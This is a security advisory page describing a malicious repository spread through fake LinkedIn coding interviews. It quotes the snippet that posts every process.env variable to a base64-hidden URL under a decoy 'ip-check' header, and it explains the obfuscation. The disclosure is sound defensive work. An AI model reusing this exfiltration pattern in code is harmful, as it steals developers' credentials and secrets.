VDB

GCVE-110-OSM-2026-1036

GCVE-110-OSM-2026-1036
Advisory PublishedCVSS 5.4/10
Vulnetix · Advisory published March 27, 2026
The file https://github.com/0g-labs/0gRollPlay/blob/main/controllers/auth.js exfiltrates data using x-app-request and uploading data gathered in process.env file. This was found through a fake interview invite from LinkedIn. The interviewee is instructed to clone the repo and run it. Reviewing the URL ipcheck-six.vercel.app it appears multiple subdomains are created for several coding "tests". --- The exfiltration code is professionally crafted (lines 67–72) const setApiKey = (s) => atob(s); const verify = (api) => axios.post(api, { ...process.env }, { headers: { "x-app-request": "ip-check" } }); Three deliberate obfuscation choices: - Base64-encodes the destination URL so it's not visible in plain text - Names the function verify — sounds like a legitimate security check - Uses the header "x-app-request": "ip-check" — disguised as an IP verification request

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
5.4/10
Medium · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Affected Products

VendorProductVersionsPlatforms
unknownall (affected)

References

Browse GCVE Records

73,738 records in the GCVE database · Updated July 19, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›